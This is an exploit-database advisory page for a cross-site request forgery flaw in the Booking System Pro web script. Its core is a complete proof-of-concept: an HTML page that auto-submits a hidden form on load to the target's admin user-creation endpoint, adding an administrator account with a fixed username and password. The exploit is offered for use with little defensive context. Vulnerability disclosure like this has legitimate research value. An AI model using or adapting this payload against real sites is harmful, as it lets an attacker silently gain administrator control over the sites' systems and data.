Booking System Pro Cross Site Request Forgery

2012.09.01
Credit: DaOne
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Booking System Pro CSRF Vulnerability # Date: 28/08/2012 # Author: DaOne (@LibyanCA) # Vendor: http://www.neptunescripts.com/products # Price: $39 # CSRF Add Admin <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action="http://[target]/admin/users/add"> <input type="hidden" name="data[User][name]" value="webadmin"/> <input type="hidden" name="data[User][username]" value="webadmin"> <input type="hidden" name="data[User][password]" value="pass123"> <input type="hidden" name="data[User][email]" value="admin@email.com"> <input type="hidden" name="data[User][phone]" value=""/> <input type="hidden" name="data[User][role]" value="admin"/> </form> </body> </html>

References:

http://www.neptunescripts.com/products


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top